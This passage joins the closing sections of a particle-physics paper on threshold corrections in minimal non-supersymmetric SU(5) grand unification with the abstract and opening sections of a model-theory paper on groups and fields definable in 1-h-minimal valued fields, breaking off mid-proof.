optimized values of parameters are also listed there in Appendix C. As it can be seen, we find a very good agreement with all the fermion masses and mixing parameters with \(\chi^{2}_{\rm min}=4\). The resulting values of \(M_{N_{1}}\) and \(M_{N_{2}}\) are smaller than \(M_{\rm GUT}\) which requires \(M_{T}>10^{17.2}\) GeV as anticipated from Fig. 2. As a simple extension of the possibilities discussed above, it is straightforward to anticipate a case in which there are more than two RH neutrinos present. At least one of them is strongly coupled with the SM fermions and has a mass greater than \(M_{\rm GUT}\). It leads to the required threshold corrections for a viable charged fermion spectrum, however its contribution to the neutrino masses is sub-dominant. The other RH neutrinos have sub-GUT scale masses and can lead to a realistic light neutrino spectrum without significantly altering the threshold corrections. This scenario is exemplified by Solution III in Table 1. In this case, \(N_{3}\), with \(M_{N_{2}}>M_{\rm GUT}\), couples to the SM leptons with large couplings and gives the required threshold corrections to down-type quark sector. Notably, in this context, it is evident that the colour triplet scalar need not approach Planck-scale values to fulfil its role. ## V Conclusion This article demonstrates that the seemingly unviable relationship, \(Y_{d}=Y_{e}^{T}\), predicted by the simplest and most minimal Yukawa sector of non-supersymmetric \(SU(5)\) GUT, can be rendered viable when accounting for 1-loop corrections to the tree-level matching conditions. This is accomplished by introducing one or more copies of fermion singlets. While they do not alter the tree-level matching conditions at the scale of unification, they can yield significant corrections at the 1-loop level through their direct Yukawa interactions with the down-type quarks and the colour triplet scalar. Sizeable non-degeneracy among the singlet fermions, colour triplet scalar, and leptoquark vector can thus impart large enough threshold corrections ensuring the compatibility of the minimal Yukawa sector with the effective SM description. Our quantitative analysis reveals that achieving a realistic spectrum for the charged fermion Yukawa couplings and quark mixing necessitates either a significantly larger mass for the colour triplet scalar (\(M_{T}\gg M_{X}\)) or vastly higher masses for the RH neutrinos (\(M_{N_{\alpha}}\gg M_{X}\)), under the assumption that the mass of the leptoquark gauge boson (\(M_{X}\)) defines the unification scale. The latter possibility is disfavoured if the same fermion singlets are expected to generate a viable light neutrino spectrum through the conventional type I seesaw mechanism. Nonetheless, the scenario of \(M_{N_{\alpha}}\gg M_{X}\) remains a plausible option if neutrinos acquire their masses through other means. This also includes type I seesaw mechanism with additional copies of RH neutrinos with sub-GUT scale masses and comparatively smaller couplings with the SM leptons. It is noteworthy that the inclusion of quantum corrections can substantially alter the conclusions regarding the minimal Yukawa sector within the framework of an underlying grand unified theory. These findings provide motivation for conducting analogous investigations in the context of supersymmetric variants of \(SU(5)^{2}\), as well as both the ordinary and supersymmetric versions of \(SO(10)\) GUTs, which feature more diverse particle spectra for threshold corrections and, simultaneously, more stringent symmetries that engage in intricate interplays. ## Acknowledgements We acknowledge illuminating discussions with Charanjit Singh Aulakh and Anjan S. Joshipura. This work is partially supported under the MATRICS project (MTR/2021/000049) funded by the Science & Engineering Research Board (SERB), Department of Science and Technology (DST), Government of India. KMP also acknowledges support from the ICTP through the Associates Programme (2023-2028) where part of this work was carried out.
2303.01127
On groups and fields definable in 1-h-minimal fields
We show that an infinite group $G$ definable in a $1$-h-minimal field admits a strictly $K$-differentiable structure with respect to which $G$ is a (weak) Lie group, and show that definable local subgroups sharing the same Lie algebra have the same germ at the identity. We conclude that infinite fields definable in $K$ are definably isomorphic to finite extensions of $K$ and that $1$-dimensional groups definable in $K$ are finite-by-abelian-by-finite. Along the way we develop the basic theory of definable weak $K$-manifolds and definable morphisms between them.
Juan Pablo Acosta, Assaf Hasson
2023-03-02T10:18:50Z
http://arxiv.org/abs/2303.01127v1
# On groups and fields definable in \(1\)-h-minimal fields ###### Abstract. We show that an infinite group \(G\) definable in a \(1\)-h-minimal field admits a strictly \(K\)-differentiable structure with respect to which \(G\) is a (weak) Lie group, and show that definable local subgroups sharing the same Lie algebra have the same germ at the identity. We conclude that infinite fields definable in \(K\) are definably isomorphic to finite extensions of \(K\) and that \(1\)-dimensional groups definable in \(K\) are finite-by-abelian-by-finite. Along the way we develop the basic theory of definable weak \(K\)-manifolds and definable morphisms between them. The authors were supported by ISF grants No. 555/21. ## 1. Introduction Various Henselian valued fields are amenable to model theoretic study. Those include the \(p\)-adic numbers (more generally, \(p\)-adically closed fields), and (non-trivially) valued real closed and algebraically closed fields, as well as various expansions thereof (e.g. by restricted analytic functions). Recently, a new axiomatic framework for tame valued fields (of characteristic \(0\)) was introduced. This framework, known as Hensel-minimality1, was suggested in [4] and [5] as a valued field analogue of o-minimality. The notion of \(1\)-h-minimality is both broad and powerful. Known examples include, among others, all pure Henselian valued fields of characteristic \(0\) as well as their expansions by restricted analytic functions. Known tameness consequences of \(1\)-h-minimality include a well-behaved dimension theory, and strong regularity of definable functions (e.g., a generic Taylor approximation theorem for definable functions). Footnote 1: In [4] and [5] various notions of Hensel-minimality – \(n\)-h-minimality – for \(n\in\mathbb{N}\cup\{\omega\}\), were introduced. For the sake of clarity of exposition, we will only discuss \(1\)-h-minimality. In the present paper, we initiate a study of groups definable in \(1\)-h-minimal fields. Using the above mentioned tameness and regularity conditions provided by \(1\)-h-minimality and inspired by similar studies in the o-minimal setting (initiated in [11]) and in \(p\)-adically closed fields ([12]) our first theorem (Proposition 6.4, stated here in a slightly weaker form) is: **Theorem 1**.: _Let \(K\) be a \(1\)-h-minimal field, \(G\) an infinite group definable in \(K\). Then \(G\) admits a definable weak \(\mathcal{C}^{k}\) (any \(k\)) manifold structure with respect to which \(G\) has the structure of a strictly differentiable weak \(\mathcal{C}^{k}\)-Lie group. I.e., the forgetful functor from definable strictly differentiable weak Lie groups to definable groups is an equivalence of categories. If algebraic closure coincides with definable closure in \(K\), then a definable weak Lie group is a definable Lie group._ Above by a definable weak Lie group (over \(K\)) we mean a Lie group whose underlying \(K\)-manifold structure may not have a definable (so, in particular, finite) atlas but can be covered by (the domains of) finitely many compatible etale maps. We do not know whether this is a necessary requirement for the correctness of the statement, or an artifact of the proof: we follow Pillay's argument in the o-minimal and \(p\)-adic contexts ([11], [12]), but the fact that in the present setting finite covers are not generically trivial, requires that we work with weakly definable manifolds, in the above sense. To pursue this argument, we have to extend the study of definable functions beyond what was done in [4] (and its sequel). Specifically, instead of working with continuously differentiable functions (as is the case in the o-minimal setting) we are working with strictly differentiable functions, and for those we prove an inverse function theorem, allowing us to deduce an implicit function theorem for definable functions as well as other standard consequences of these theorems. We do not know whether strict differentiability follows in the \(1\)-h-minimal context from continuous differentiability (as is the case in real analysis), but it can be easily inferred from a multi-variable Taylor approximation theorem for definable functions available in this context. Having established that definable groups are Lie, our next theorem establishes the natural Lie correspondence (asserting that the germ of a definable group morphism at the identity is determined by its derivative at that point). For applications it is convenient to state the result for local groups (Corollary 6.11): **Theorem 2**.: _Let \(K\) be a \(1\)-h-minimal field, \(U\) and \(V\) definable strictly differentiable local Lie groups and \(g,f:U\to V\) definable strictly differentiable local Lie group morphisms. If we denote \(Z=\{x\in U:g(x)=f(x)\}\), then \(\dim_{e}Z=\dim(\ker(f^{\prime}(e)-g^{\prime}(e)))\)._ We then prove two applications. First, we show - adapting techniques from the o-minimal context - that every infinite field definable in a \(1\)-h-minimal field, \(K\), is definably isomorphic to a finite extension of \(K\), Proposition 7.3. This generalizes an analogous result for real closed valued fields ([2]) and \(p\)-adically closed fields ([12]). It will be interesting to know whether these results can be extended to _interpretable_ fields (in the spirit of [6] or [9, SS6] under suitable additional assumptions on the RV-sort. Our next application is a proof that definable \(1\)-dimensional groups are finite-by-abelian-by-finite, Corollary 8.10. This generalizes analogous results in the o-minimal context ([11]), in \(p\)-adically closed fields ([12]) and combines with [1] to give a complete classification of \(1\)-dimensional groups definable in \(\mathrm{ACVF}_{0}\). The present paper is a first step toward the study of groups definable in \(1\)-h-minimal fields. It seems that more standard results on Lie groups over complete local fields can be extended to this context. Thus, for example, it can be shown that any definable local group contains a definable open subgroups. As the proof is long and involves new techniques we postpone it to a subsequent paper. ### Structure of the paper In Section 2 we review the basics of \(1\)-h-minimality and dimension theory in geometric structures. In Section 3 we prove a multi-variable Taylor approximation theorem for \(1\)-h-minimal fields, and formulate some strong regularity conditions (implied, generically, by Taylor's theorem) that will be needed in later parts of the paper. These results are, probably, known to the experts, and we include them mostly for the sake of completeness and clarity of exposition (as some of them do not seem to exist in writing). In Section 4 we prove the inverse function theorem and related theorems on the local structure of immersions, submersions and constant rank functions. Though some of the proofs are similar to those of analogous statements in real analysis (and, more generally, in the o-minimal context) this is not true throughout. Specifically, \(1\)-h-minimality is invoked in a crucial way in the proof that a function with vanishing derivative is locally constant, which - in turn - is used in our proof of the Lie correspondence for definable groups. Using the results of the first sections, our study of definable groups starts in Section 6. We first show that definable groups can be endowed with an, essentially unique, strictly differentiable weak Lie group structure, and that the germ of definable group morphisms are determined by their derivative at the identity. We then define the (definable) Lie algebra associated with a definable Lie group, and show that it satisfies the familiar properties of Lie algebras. This is done using a local computation, after characterizing the Lie bracket as the second order part of the commutator function near the identity. Section 7 is dedicated to the classification of fields definable in \(1\)-h-minimal fields, and in Section 8 we prove our results on definable one dimensional groups. ## 2. Preliminaries In this section we set some background definitions, notation and describe basic relevant results, used in later sections. Most of the terminology below is either standard or taken from [4]. Throughout, \(K\) will denote a non-trivially valued field. We will not distinguish, notationally, between the structure and its universe. Formally, we allow \(K\) to be a multi-sorted structure (with all sorts coming from from \(K^{eq}\)), but by a definable set we mean (unless explicitly stated otherwise) a subset of \(K^{n}\) definable with parameters. All tuples are finite, and we write (as is common in model theory) \(a\in K\) for \(a\in K^{n}\) for \(n=\operatorname{length}(a)\). We apply the same convention to variables. To stress the analogy of the current setting with the Real numbers we use multiplicative notation for the valuation. Thus, the valued group is denoted \((\Gamma,\cdot)\) and the valuation \(|\cdot|:K\to\Gamma_{0}=\Gamma\cup\{0\}\), and if \(x\in K^{n}\) we set \(|x|:=\max_{1\leq k\leq n}|x_{k}|\). An open ball of (valuative) radius \(r\in\Gamma\) in \(K^{n}\) is a set of the form \(B=\{x\in K^{n}:|x-a|<r\}\) for \(a\in K^{n}\). The balls endow \(K\) with a field topology (the valuation topology). Up until Section 6 all topological notions mentioned in the text will refer solely to this topology. We denote \(\mathcal{O}:=\{x:|x|\leq 1\}\), the valuation ring, \(\mathcal{M}:=\{x\in\mathcal{O}:|x|<1\}\), the valuation ideal, and \(k:=\mathcal{O}/\mathcal{M}\), the residue field. We also denote \(RV=K^{\times}/1+\mathcal{M}\). More generally, whenever \(s\in\Gamma\) and \(s\leq 1\), we denote \(\mathcal{M}_{s}=\{x\in K:|x|<s\}\), and \(RV_{s}=K^{\times}/1+\mathcal{M}_{s}\). If \(K\) has mixed characteristic \((0,p)\), we denote \(RV_{p,n}=RV_{|p|^{n}}\) and \(RV_{p,\bullet}=\bigcup_{n}RV_{p,n}\). It is convenient, when discussing approximation theorems, to adopt the big-O notation from real analysis. For the sake of clarity we recall this notation in the valued field setting: **Definition 2.1**.: 1. If \(f:U\to K^{m}\) and \(g:U\to\Gamma_{0}\) are functions defined in an open neighborhood of \(0\) in \(K^{n}\), then \(f(x)=O(g(x))\) means that there are \(r,M>0\) in \(\Gamma\) such that if \(|x|<r\) then \(|f(x)|\leq Mg(x)\). We also denote \(f_{1}(x)=f_{2}(x)+O(g(x))\) if \(f_{1}(x)-f_{2}(x)=O(g(x))\). 2. If \(g:U\to K^{r}\), and \(s\in\mathbb{N}\), then \(O(g(x)^{s})=O(|g(x)|^{s})\). 3. If \(f:Y\times U\to K^{m}\), is a function where \(U\) is an open neighborhood of \(0\) in \(K^{n}\), and if \(g:U\to\Gamma_{0}\), then \(f(y,x)=O_{y}(g(x))\) means that for every \(y\in Y\), there are \(r_{y},M_{y}>0\), such that if \(|x|<r_{y}\) then \(|f(y,x)|\leq M_{y}g(x)\). As mentioned in the introduction, in the present paper we are working with the notion of strict differentiability, which we now recall: **Definition 2.2**.: Let \(U\subset K^{n}\) be an open subset and \(f:U\to K^{m}\) be a map. Then \(f\) is strictly differentiable at \(a\in U\) if there is a linear map \(A:K^{n}\to K^{m}\) such that for every \(\epsilon>0\), there exists \(\delta>0\) satisfying \(|f(x)-f(y)-A(x-y)|\leq\epsilon|x-y|\) for every \(x,y\) such that \(|x-a|<\delta\) and \(|y-a|<\delta\). \(f\) is strictly differentiable in \(U\) if it is strictly differentiable at every point of \(U\). In the situation of the definition the linear map \(A\) is uniquely determined and denoted \(f^{\prime}(a)\). If \(f\) is strictly differentiable in an open \(U\), then it is continuously differentiable. **Definition 2.3**.: Let \(U\subset K^{n}\) and \(V\subset K^{n}\) be open subsets. Then \(f:U\to V\) is a strict diffeomorphism if it is strictly differentiable, bijective and its inverse is strictly differentiable. As we will see, a strict diffeomorphism is just a strictly differentiable diffeomorphism. Given an open ball \(B\subseteq K^{n}\) of radius \(r\), a subset \(Y\) of \(K^{n}\), and an element \(s\in\Gamma\) with \(s\leq 1\), we say that \(B\) is \(s\)-next to \(Y\) if \(B^{\prime}\cap Y=\emptyset\) for \(B^{\prime}\) the open ball of radius \(s^{-1}r\) containing \(B\). Note that every point not in the closure of \(Y\) is contained in a ball \(s\)-next to \(Y\). This is because if \(B\) is an open ball of radius \(r\) disjoint from \(Y\), then every open ball of radius \(sr\) contained in \(B\) is \(s\)-next to \(Y\). Following [4] we say that a finite set \(Y\subset K\) prepares the set \(X\subset K\), if for every ball, \(B\), disjoint from \(Y\) is either disjoint from \(X\) or contained in \(X\). More generally, if \(s\in\Gamma\) is such that \(s\leq 1\), then \(Y\)\(s\)-prepares \(X\) if every open ball \(B\)\(s\)-next to \(Y\) is either contained in \(X\) or disjoint from \(X\). If \(K\) is a valued field of mixed characteristic \((0,p)\), given an integer \(m\in\mathbb{N}\), an open ball, \(B\subseteq K^{n}\), and a set \(Y\subseteq K^{n}\), we say that \(B\) is \(m\)-next to \(Y\) if it is \(|p|^{m}\)-next to \(Y\). Similarly, if \(s\in\Gamma\) and \(s\leq 1\) then \(B\) is \(m\)-\(s\)-next to \(Y\) if it is \(|p|^{m}s\)-next to \(Y\). Given a finite \(Y\subset K\) and \(X\subset K\), we say that \(Y\)\(m\)-prepares (resp. \(m\)-\(s\)-prepares) the set \(X\) if \(Y\)\(|p|^{m}\)-prepares \(X\) (resp. \(Y\)\(|p|^{m}s\)-prepares \(X\)). Next, we recall the definitions of 1-h-minimality defined in the equi-characteristic \(0\) ([4]) and in mixed characteristic ([5]) settings: **Definition 2.4**.: Let \(K\) be an \(\aleph_{0}\)-saturated non-trivially valued field of characteristic \(0\), which is a structure in a language extending the language of valued fields. 1. If \(K\) has residue characteristic \(0\) then \(K\) is \(1\)-h-minimal, if for any \(s\leq 1\) in \(\Gamma\) any \(A\subseteq K\), \(A^{\prime}\in RV_{s}\) (a singleton) and every \((A\cup RV\cup A^{\prime})\)-definable set \(X\subset K\), there is an \(A\)-definable finite set \(Y\subset K\)\(s\)-preparing \(X\). 2. If \(K\) has mixed characteristic \((0,p)\) then \(K\) is \(1\)-h-minimal, if for any \(s\leq 1\) in \(\Gamma\) any \(A\subseteq K\), \(A^{\prime}\in RV_{s}\) (a singleton) and every \((A\cup RV_{p,\bullet}\cup A^{\prime})\)-definable set \(X\subset K\), there is \(m\in\mathbb{N}\) and an \(A\)-definable finite set \(Y\subset K\) which \(m\)-\(s\)-prepares \(X\). In the sequel, when appealing directly to the definition, we will only need the case \(s=1\) (so \(A^{\prime}\) does not appear). The parameter \(s\) does appear implicitly, though, when applying properties of \(1\)-h-minimality such as generic continuity of definable functions (see [4, Proposition 5.1.1]). Below we will need to study properties of "one-to-finite definable functions" (definable correspondences, in the terminology of [15]). It turns out that statements regarding such objects can sometimes be reduced to statements on definable functions in expansions of the language by algebraic Skolem functions (i.e., Skolem functions for definable finite sets). For this, the following will be convenient (see [4, Proposition 4.3.3], and [5, Proposition 3.2.2]): **Fact 2.5**.: _Suppose \(K\) is a 1-h-minimal valued field. Then there exists a language \(\mathcal{L}^{\prime}\supseteq\mathcal{L}\), an elementary extension \(K^{\prime}\) of \(K\), and an \(\aleph_{0}\)-saturated \(\mathcal{L}^{\prime}\)-structure on \(K^{\prime}\) extending the \(\mathcal{L}\)-structure of \(K^{\prime}\), such that \(K^{\prime}\) is 1-h-minimal as an \(\mathcal{L}^{\prime}\)-structure, and such that \(\operatorname{acl}_{\mathcal{L}^{\prime}}(A)=\operatorname{dcl}_{\mathcal{L}^ {\prime}}(A)\) for all \(A\subseteq K^{\prime}\)._ Above and throughout, algebraic and definable closures are always assumed to be taken in the \(K\) sort. In the sequel we will refer to the property appearing in the conclusion of Fact 2.5 simple as "\(\operatorname{acl}=\operatorname{dcl}\)". **Remark 2.6**.: Given an \(\mathcal{L}\)-definable set, \(S\), statements concerning topological or geometric properties of \(S\) are often expressible by first-order \(\mathcal{L}\)-formulas. As the topology on \(K\) is definable in the valued field language, and the dimension of definable sets in \(1\)-minimal minimal structure is determined by the topology (see Proposition 2.11), the truth values of the hypothesis and conclusion of such statements (for our fixed \(\mathcal{L}\)-definable set \(S\)) are the same in \(K\) and in any elementary extension \(K\prec K^{\prime}\), as well as in any \(1\)-h-minimal expansion of the latter. Therefore, by Fact 2.5, in the proof of such statements (for a fixed definable \(S\)) there is no harm assuming \(\operatorname{acl}=\operatorname{dcl}\). ### Geometric structures Geometric structures were introduced in [8, SS2]. Let us recall the definition: An \(\aleph_{0}\)-saturated structure, \(M\) is _pregeometric_ if \(\operatorname{acl}(\cdot)\) is a matroid, that is, it satisfies the exchange property: \[\text{if }a\in\operatorname{acl}(Ab)\setminus\operatorname{acl}(A),\text{ then }b\in \operatorname{acl}(Aa)\text{ for singletons }a,b\in M.\] In this situation the matroid gives a notion of dimension, \(\dim(a/b)\), the dimension of a tuple \(a\) over a tuple \(b\) as the smallest length of a sub-tuple \(a^{\prime}\) of \(a\) such that \(a\in\operatorname{acl}(a^{\prime}b)\), and the dimension of a \(b\)-definable set \(X\) as the maximum of the dimensions \(\dim(a/b)\) with \(a\in X\) (this does not depend on \(b\)). As is customary, we set \(\dim(\emptyset)=-\infty\). We recall the basic properties of dimension (see [8, SS2] for all references). This dimension satisfies the additivity property \[\dim(ab/c)=\dim(a/bc)+\dim(b/c),\] that we will invoke without further reference. We call \(a\) and \(b\) algebraically independent over \(c\) if \(\dim(a/bc)=\dim(a/c)\). Note that by additivity of dimension this is a symmetric relation. Note also that additivity implies that if \(b,c\) are inter-algebraic over \(a\), meaning \(b\in\operatorname{acl}(ac)\) and \(c\in\operatorname{acl}(ab)\), then \(\dim(b/a)=\dim(c/a)\) (in particular, this holds when \(c\) is the image of \(b\) under an \(a\)-definable bijection). If \(M\) is a pregeometric structure and \(f:X\to Y\) is a surjective definable function with fibers of constant dimension \(k\), then \(\dim(X)=\dim(Y)+k\). This is a consequence of the additivity formula. Given an \(a\)-definable set \(X\), a generic element of \(X\) over \(a\) is an element \(b\in X\) such that \(\dim(b/a)=\dim(X)\). By compactness generic elements can always be found in saturated enough models. We call \(Y\subset X\) large if \(\dim(X\setminus Y)<\dim(X)\). This is equivalent to \(Y\) containing every generic point of \(X\). A pregeometric structure, \(M\), eliminating the quantifier \(\exists^{\infty}\) is called geometric. If \(M\) is geometric dimension is definable in definable families. Namely, for \(\{X_{a}\}_{a\in S}\), a definable family, the set \(\{a\in S:\dim(X_{a})=k\}\) is definable. The following simple fact is a translation of the definition of a pregeometry to a property of definable sets. Note as an aside that this reformulation implies that the property of being a pregeometry is preserved under reducts. I.e., if \(M\) is an \(\aleph_{0}\)-saturated pregeometric \(\mathcal{L}^{\prime}\)-structure, and \(\mathcal{L}\subset\mathcal{L}^{\prime}\), then \(M\) is also a pregeometric \(\mathcal{L}\)-structure. For the sake of completeness, we give the proof: **Fact 2.7**.: _Suppose \(M\) is an \(\aleph_{0}\)-saturated structure. Then \(M\) is pregeometric if and only if for every definable \(X\subset M\times M\) if the projection, \(\pi_{1}:X\to M\), into the first factor is finite-to-one, and \(\pi_{2}:X\to M\) is the projection into the second factor, then the set \(Y=\{c\in M:\pi_{2}^{-1}(c)\cap X\text{ is infinite}\}\) is finite._ Proof.: Suppose \(M\) is pregeometric and suppose \(X\subset M\times M\) is \(A\)-definable such that \(\pi_{1}^{-1}(x)\cap X\) is finite for all \(x\in M\). Suppose also that \(Y=\{y\in M:\pi_{2}^{-1}(y)\cap X\text{ is infinite}\}\) is infinite. By compactness and saturation, we can choose \(b\in Y\) such that \(\dim(b/A)=1\). Similarly, we can find \(a\in\pi_{2}^{-1}(b)\cap X\) such that \(\dim(a/Ab)=1\). We conclude that \(\dim(ab/A)=2\), and so \(\dim(X)\geq 2\). This contradicts the fact that \(\pi_{1}^{-1}(x)\cap X\) is finite for all \(x\in M\). For the converse, suppose \(A\) is a finite subset of \(M\) and \(a,b\in M\) are singletons such that \(a\in\operatorname{acl}(Ab)\setminus\operatorname{acl}(A)\). Then there is an \(A\)-definable set \(X\subset M\times M\) such that \((b,a)\in X\) and \(\pi_{1}^{-1}(b)\cap X\) is finite, say of cardinality \(k\). If we take \(Z=\{c\in M:\pi_{1}^{-1}(c)\cap X\text{ has cardinality }k\}\), then we may replace \(X\) by \(X\cap Z\times M\), and we may assume that \(\pi_{1}^{-1}(c)\cap X\) is either empty or of constant finite cardinality for all \(c\in M\). In this case, by the hypothesis we conclude that \(Y=\{y\in M:\pi_{2}^{-1}(y)\cap M\text{ is infinite}\}\) is finite. Note that \(Y\) is \(A\)-invariant and definable, so it is \(A\)-definable. We conclude that \(a\notin Y\), because \(a\notin\operatorname{acl}(A)\), and so \(b\in\operatorname{acl}(Aa)\) as required. The next characterization of the \(\operatorname{acl}\)-dimension should be well known: **Fact 2.8**.: _Suppose \(M\) is an \(\aleph_{0}\)-saturated structure, which eliminates the \(\exists^{\infty}\) quantifier. Suppose there is a function, \(X\mapsto d(X)\), from the non-empty definable subsets of (cartesian powers of) \(M\) into \(\mathbb{N}\) satisfying:_ 1. _If_ \(X\subset M^{n}\times M\) _is such that the first coordinate projection_ \(\pi_{1}:X\to M^{n}\) _is finite to one, then_ \(d(X)=d(\pi_{1}(X))\)_._ 2. _If_ \(X\subset M^{n}\times M\) _is such that the first coordinate projection_ \(\pi_{1}:X\to M^{n}\) _has infinite fibers, then_ \(d(X)=d(\pi_{1}(X))+1\)_._ 3. _If_ \(\pi:M^{n}\to M^{n}\) _is a coordinate permutation, then_ \(d(X)=d(\pi(X))\) _ 4. \(d(X\cup Y)=\max\{d(X),d(Y)\}\)_._ 5. \(d(M)=1\)__ 6. \(d(X)=0\) _if and only if_ \(X\) _is finite._ _Then \(M\) is a geometric structure and \(d\) coincides with its \(\operatorname{acl}\)-dimension._ Proof.: It suffices to show that \(M\) is pregeometric. We use Fact 2.7. Let \(X\subset M\times M\) be such that \(\pi_{1}^{-1}(x)\cap X\) is finite for all \(x\in M\). Take \(Y=\{y\in M:\pi_{2}^{-1}(y)\cap X\text{ is infinite}\}\). Because \(M\) eliminates the \(\exists^{\infty}\) quantifier we have that \(Y\) is definable. If \(Y\) is infinite we conclude that \(d(X)\geq d(X\cap\pi_{2}^{-1}(Y))=d(Y)+1=2\). The first inequality by item (4), the second equality by items (3) and (2), and the third by item (6). On the other hand \(d(X)=d(\pi_{1}(X))\leq d(M)=1\), the first equality by item (1), the second inequality by item (4) and the third by item (5). This is a contradiction and finishes the proof. In order to see that \(d(X)=\dim(X)\) for \(X\subset M^{n}\) we may proceed by induction on \(n\). The base case \(n=1\) follows from item (4), (5) and (6). So suppose that \(X\subset M^{n}\times M\). Denote \(Y=\{x\in M^{n}:\pi_{1}^{-1}(x)\cap X\text{ is infinite}\}\). By hypothesis \(Y\) is a definable set. Denote \(X_{1}=\pi_{1}^{-1}(Y)\cap X\) and \(X_{2}=X\setminus X_{1}\). Then by items (1),(2) and (4) we conclude that \(d(X)=\max\{d(X_{1}),d(X_{2})\}=\max\{d(Y)+1,d(\pi_{1}(X)\setminus Y)\}\). For the same reason we have the formula \(\dim(X)=\max\{\dim(Y)+1,\dim(\pi_{1}(X)\setminus Y)\}\), so \(d(X)=\dim(X)\) as required. The next fact is also standard: **Fact 2.9**.: _Suppose \(M\) is a geometric structure. Suppose \(X\subset M^{n}\) is \(a\)-definable. Then there is a partition of \(X\) into a finite number of \(a\)-definable sets \(X=X_{1}\cup\dots\cup X_{n}\), such that for each member of the partition \(X_{k}\), there is a coordinate projection \(\pi:X_{k}\to M^{r}\) which is finite to one and has image of dimension \(r\)._ **Remark 2.10**.: For this statement we need to allow the identity \(\operatorname{id}:M^{n}\to M^{n}\) as a coordinate projection. Also, recall that \(M^{0}\) is a set consisting of one element. For this statement we also need to allow the constant function \(M^{n}\to M^{0}\) as a coordinate projection. Proof.: By induction on the dimension of the ambient space \(n\). Consider the projection onto the first \(n-1\) coordinates \(\pi_{1}:M^{n}\to M^{n-1}\). Then the set \(Y\subset M^{n-1}\) of \(y\) such that the fibers \(X_{y}=\pi_{1}^{-1}(y)\cap X\) are infinite is definable. So partitioning \(X\) we may assume all the nonempty fibers of \(X\) over \(M^{n-1}\) are finite, or all are infinite. If all the fibers of \(X\to K^{n-1}\) are finite then we finish by induction. If all the nonempty fibers are infinite then by the induction there is a partition \(Y=\bigcup_{i}Y_{i}\) and for each \(Y_{i}\) there is a coordinate projection \(\tau:Y_{i}\to K^{r}\) with finite fibers and \(r=\dim(Y_{i})\). Denote \(\pi_{2}:M^{n}\to M\) the projection onto the last coordinate. Then setting \(X_{i}=X\cap\pi_{1}^{-1}(Y_{i})\), the projection \(\pi(x)=(\tau(\pi_{1}(x)),\pi_{2}(x))\) has the desired properties. The next proposition is key. It asserts that \(1\)-h-minimal fields are geometric, and it connects (combined with the previous fact) topology and dimension in such structures: **Proposition 2.11**.: _Suppose \(K\) is a 1-h-minimal valued field. Then:_ 1. \(K\) _is a geometric structure._ _._ 2. _Every_ \(X\subset K^{n}\) _satisfies_ \(\dim(X)=n\) _if and only if_ \(X\) _has nonempty interior. Every_ \(X\subset K^{n}\) _satisfies_ \(\dim(X)<n\) _if and only if_ \(X\) _is nowhere dense._ 3. _For_ \(X\subset K^{n}\)_, we have_ \(\dim(X)=\max_{x\in X}\dim_{x}(X)\)_, where we denote_ \(\dim_{x}(X)\) _the local dimension of_ \(X\) _at_ \(x\)_, defined as_ \(\dim_{x}(X)=\min\{\dim(B\cap X):x\in B\text{ is an open ball}\}\)__ Proof.: This is essentially items (1)-(5) of [4, Proposition 5.3.4] in residue characteristic \(0\) and contained in [5, Proposition 3.1.1] in mixed characteristic. For example, assume \(K\) has residue characteristic \(0\). That \(K\) is geometric is proved in the course of the proof of [4, Proposition 5.3.4]. We can also derive it from Fact 2.8 and [4, Proposition 5.3.4]. The topological characterization \(\dim(X)=n\) if and only if \(X\) has nonempty interior, is a particular case of item (1) in [4, Proposition 5.3.4]. That \(\dim(X)<n\) if and only if \(X\) is nowhere dense follows from this. Indeed, if \(\dim(X)=n\), then \(X\) has nonempty interior and so it is not nowhere dense. If \(\dim(X)<n\) and \(U\subset K^{n}\) is nonempty open, then \(\dim(U\setminus X)=n\), and so \(U\setminus X\) has nonempty interior. This implies \(X\) is nowhere dense. That dimension is the maximum of the local dimensions is item (5) of Proposition 5.3.4 of [4] **Proposition 2.12**.: _Suppose \(K\) is a 1-h-minimal field. Suppose \(f:U\to K^{m}\) is a definable function. Then there is a definable open dense subset \(U^{\prime}\subset U\) such that \(f:U^{\prime}\to K^{m}\) is continuous._ Proof.: This is essentially a particular case of [4, Proposition 5.1.1] in residue characteristic \(0\), and contained in [5, Proposition 3.1.1] in mixed characteristic. Indeed, because the intersection of open dense sets is open and dense we reduce to the case \(m=1\). From those propositions one gets that the set \(Z\) of points where \(f\) is continuous is dense in \(U\). As \(Z\) is not nowhere dense we conclude using item (2) of Proposition 2.11 that \(\dim(Z)=n\) and so \(Z\) has nonempty interior. If \(V\subset U\) is a nonempty open definable subset then, as \(Z\cap V\) is the set of points at which \(f|_{V}\) is continuous, by what we just proved \(Z\cap V\) has nonempty interior. We conclude that the set of points at which \(f\) is continuous has a dense interior in \(U\), as desired. Next we describe a topology for \(Y^{[s]}\), the set of subsets of \(Y\) of cardinality \(s\), for \(Y\) a Hausdorff topological space, and \(s\) a positive integer. We prove a slightly more general statement that will be applied when \(X\) is \(Y^{s}\setminus\Delta\), the set of tuples of \(Y^{s}\) with distinct coordinates and the symmetric group, \(S_{s}\), on \(s\) elements acting on \(Y^{s}\) by coordinate permutation, in which case the orbit space is identified with \(Y^{[s]}\). **Fact 2.13**.: _Suppose \(X\) is a Hausdorff topological space, and \(G\) a finite group acting on \(X\) by homeomorphisms, and such that every \(x\in X\) has a trivial stabilizer in \(G\). Then \(X/G\) equipped with the quotient topology is Hausdorff and the map \(p:X\to X/G\) is a closed finite covering map. In fact for every \(x\in X\) there is an open set \(x\in U\subset X\) such that \(\{gU:g\in G\}\) are pairwise disjoint, \(p^{-1}p(U)=\bigcup_{g}gU\) and \(p|_{gU}\) is a homeomorphism onto \(p(U)\)._ Proof.: We know that \(p\) is open, since \(p^{-1}p(U)=\bigcup_{g\in G}gU\) is open for \(U\) open. Consider the orbit \(\{gx\}_{g\in G}\) of \(x\). By assumption, if \(g\neq h\), then \(gx\neq hx\). Let \(V\) be an open set in \(X\) containing \(\{gx\}_{g\in G}\). Now, because \(X\) is Hausdorff, we conclude that there are \(U_{g}\) open neighborhoods of \(gx\), contained in \(V\), such that \(U_{g}\cap U_{h}=\emptyset\) for \(g\neq h\). If we take \(U=\bigcap_{g\in G}g^{-1}U_{g}\), then and so \(\{gU:g\in G\}\) are pairwise disjoint. We conclude that \(p\) is closed and restricted to \(gU\) is a homeomorphism. That \(X/G\) is Hausdorff now follows from this. Indeed, if \(p(x)\neq p(y)\), then there are open sets \(V_{1}\) and \(V_{2}\) of \(X\), which are disjoint and such that \(p^{-1}p(x)\subset V_{1}\) and \(p^{-1}p(y)\subset V_{2}\). Because \(p\) is closed there are open sets \(p(x)\in U_{1}\) and 